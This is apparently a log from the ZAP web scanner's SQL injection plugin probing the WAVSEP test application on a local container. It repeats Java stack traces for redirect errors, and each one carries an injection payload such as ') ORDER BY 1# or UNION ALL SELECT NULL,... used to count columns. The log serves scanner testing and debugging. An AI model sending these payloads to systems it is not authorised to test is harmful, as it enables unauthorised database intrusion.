[http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 2625#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) ORDER BY 2625# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679498 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679498 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679499 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679500 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679500 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679501 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679501 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679502 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679503 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') ORDER BY 7358#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') ORDER BY 7358# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679504 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679504 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/none892j3kd.txt) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: incorrect path at org.apache.commons.httpclient.URI.setRawPath(URI.java:2862) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679505 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [') UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/') UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at 